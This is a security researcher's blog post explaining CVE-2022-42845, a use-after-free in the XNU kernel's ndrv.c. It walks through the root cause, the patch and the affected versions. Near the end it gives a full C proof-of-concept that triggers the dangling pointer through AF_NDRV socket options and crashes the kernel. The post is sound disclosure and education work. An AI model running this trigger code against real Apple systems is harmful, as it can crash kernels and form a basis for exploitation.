Adam Doupé

Associate Professor, Arizona State University
Director, Center for Cybersecurity and Trusted Foundations

CVE-2022-42845: 20-Year-Old XNU Use After Free Vulnerability in ndrv.c

| Comments

I’ve been on a sabbatical this academic year, and my goal is to understand the state-of-the art in exploitation and vulnerability analysis by doing it myself, which I expanded on previously.

This post describes the first vulnerability that I found in the XNU kernel, which is the Operating System used for a number of Apple products, including Macs, iPhones, iPads, lots of i-devices really.

The vulnerability is a 20-year-old use-after-free vulnerability in XNU in ndrv.c, which can be triggered by a root user creating an AF_NDRV socket, and I learned a ton through identifying the root cause, the fix, and creating a proof-of-concept that triggers the vulnerability. And it was quite cool to see my name on the security notes.

Root Cause

An attacker with root privileges can cause a dangling pointer in the nd_multiaddrs linked list where the data is freed but never removed from the linked list.

In ndrv.c:ndrv_do_remove_multicast, the nd_multiaddrs linked list is iterated over to remove the entry ndrv_entry from the nd_multiaddrs linked list with the following code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
        /* Find the old entry */
      ndrv_entry = ndrv_have_multicast(np, multi_addr);

      // ...

      // Remove from our linked list
      struct ndrv_multiaddr*  cur = np->nd_multiaddrs;

      ifmaddr_release(ndrv_entry->ifma);

      if (cur == ndrv_entry) {
          np->nd_multiaddrs = cur->next;
      } else {
          for (cur = cur->next; cur != NULL; cur = cur->next) { // adamd: Vulnerability
              if (cur->next == ndrv_entry) {
                  cur->next = cur->next->next;
                  break;
              }
          }
      }

      // ...

              ndrv_multiaddr_free(ndrv_entry, ndrv_entry->addr->sa_len);

Now, if we consider a struct ndrv_multiaddr* linked list of the following:

1
A -> B -> NULL

Where A is nd_multiaddrs (the head of the list) and B is ndrv_entry (the entry that we are deleting).

The start of the for loop sets cur to cur->next, and the if condition in the for loop compares cur->next to ndrv_entry to remove ndrv_entry from our list.

In our example, this will set cur = B at the start of the for loop, then test NULL == B, and the if condition will never trigger.

Thus, even though B is freed after this loop (in the call to ndrv_multiaddr_free), the nd_multiaddrs linked list in our example still looks like:

1
A -> B -> NULL

The conditions for triggering this vulnerability are that there must be at least two elements on the nd_multiaddrs list, and the second element in the list is removed.

Real Root Cause

One of the things that I love about discovering vulnerabilities is trying to put myself in the shoes of the developer to understand why the bug occurred.

I can completely relate to the developer here: it took me awhile of walking through the code to even believe that there was a vulnerability.

On first glance, everything looks fine.

The other aspect to consider is the conditions that have to occur for the bug to be triggered: usually if an off-by-one error (which is essentially what this is) occurs it would be caught by the developer while doing normal testing: because the system wouldn’t do what it was supposed to do.

However, this condition does not trigger in the case of one element in the list, and only occurs if you delete a specific item in a list that has more than one item.

Therefore, I can completely relate to the developer making this mistake and not noticing this bug.

My Proposed Fix

A fix for the vulnerability is to not increment the cur pointer before entering the loop:

1
2
3
4
5
6
7
        for (; cur != NULL; cur = cur->next) {
          if (cur->next == ndrv_entry) {
              cur->next = cur->next->next;
              break;
          }
      }
  }

The Real Fix

And, looking at the patched version, it seems that something similar was used by abstracting the deletion logic into a function ndrv_cb_remove_multiaddr:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
ndrv_cb_remove_multiaddr(struct ndrv_cb *np, struct ndrv_multiaddr *ndrv_entry)
{
  struct ndrv_multiaddr   *cur = np->nd_multiaddrs;
  bool                    removed = false;

  if (cur == ndrv_entry) {
      /* we were the head */
      np->nd_multiaddrs = cur->next;
      removed = true;
  } else {
      /* find our entry */
      struct ndrv_multiaddr  *cur_next = NULL;

      for (; cur != NULL; cur = cur_next) {
          cur_next = cur->next;
          if (cur_next == ndrv_entry) {
              cur->next = cur_next->next;
              removed = true;
              break;
          }
      }
  }
  ASSERT(removed);
}

It is fascinating to learn how the developers fix these underlying bugs. While the bug itself was fixed, I notice two interesting additions here:

  1. Abstracting the functionality of removing a ndrv_multiaddr into a single function ndrv_cb_remove_multiaddr. In addition to being good software development practice, doing so will help prevent future bugs so developers have a single function to call to delete a ndrv_multiaddr rather than doing it themselves (and introducing another bug).

  2. The developers also added an ASSERT(removed); at the end of the function, and this is important because it essentially encodes the security requirements of the function into the ASSERT statement. If future developers change functionality here, it will be unlikely that the bug will be reintroduced (although it might not be clear to future developers why a function that attempts to remove from a linked list should never fail, so perhaps they would remove it then).

Affected Versions

From what I can tell, it seems that the vulnerable code was introduced in XNU 344 and shipped with Mac OS X Jaguar (10.2), and this bug has been present since ~2002, which makes this a 20-year old bug!

First commit: https://github.com/apple-oss-distributions/xnu/blob/fad439e77835295998e796a2547c75c42f4bc623/bsd/net/ndrv.c#L1054

POC

Here’s the POC that I wrote to trigger this bug, which uses close on the socket to call ndrv_do_detach and then ndrv_remove_all_multicast, which dereferences the dangling object:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#include <stddef.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>

/*

  Author: Adam Doupe (adamd)
  POC for CVE-2022-42845: a kernel use-after-free vulnerability in ndrv.c in XNU.
  Writeup: https://adamdoupe.com/blog/2022/12/13/cve-2022-42845-xnu-use-after-free-vulnerability-in-ndrv-dot-c/  

*/


#define TCPOPT_SACK 5
#define TCPOLEN_CC 6

struct sockaddr_generic {
  uint8_t sa_len;
  uint8_t sa_family;
};

int main()
{
   int sockfd = socket(AF_NDRV, SOCK_RAW, IPPROTO_IP);
   if (sockfd == -1)
   {
      perror("socket");
      return -1;
   }

   char* sa_data = "lo0";
   struct sockaddr_generic sag_s = {
      .sa_len = (sizeof(struct sockaddr_generic) + strlen(sa_data) + 1),
      .sa_family = AF_NS,
   };

   char* sockaddr = (char*) malloc(sag_s.sa_len);
   memcpy(sockaddr, &sag_s, sizeof(struct sockaddr_generic));
   memcpy(sockaddr + sizeof(struct sockaddr_generic), sa_data, strlen(sa_data) + 1);

   char* sockaddr_real = "\x05\x00\x6c\x6f\x30";
   int size = 5;
   int result = bind(sockfd, (struct sockaddr*)sockaddr_real, size);

   if (result != 0)
   {
      perror("bind");
      return -1;
   }

   // Add B to `nd_multiaddrs`

   char val[] = "\010\000\000\000\000\000\000\000";
   int val_size = 8;
   result = setsockopt(sockfd, 0, TCPOPT_SACK, val, val_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // Add A to `nd_multiaddrs` (which becomes the head)

   char val_2[] = "\010\000\000\374\377\000\000\000";
   int val_2_size = 8;
   result = setsockopt(sockfd, 0, TCPOPT_SACK, val_2, val_2_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // Delete B
   result = setsockopt(sockfd, 0, TCPOLEN_CC, val, val_size);
   if (result != 0)
   {
      perror("setsockopt");
      return -1;
   }

   // At this point B is freed, so we can call multiple functions to exploit

   // closing the socket will call `ndrv_do_remove_multicast` which will crash referencing the deallocated B
   close(sockfd);
}

Vulnerability Discovery

I’m not going to say much publicly at the moment as to how I found this vulnerability, because I’m still using it to find bugs.

I’ll release everything toward the end of my sabbatical, but for now it suffices to say that fuzzing techniques are amazing for finding these types of tricky corner-cases.

Comments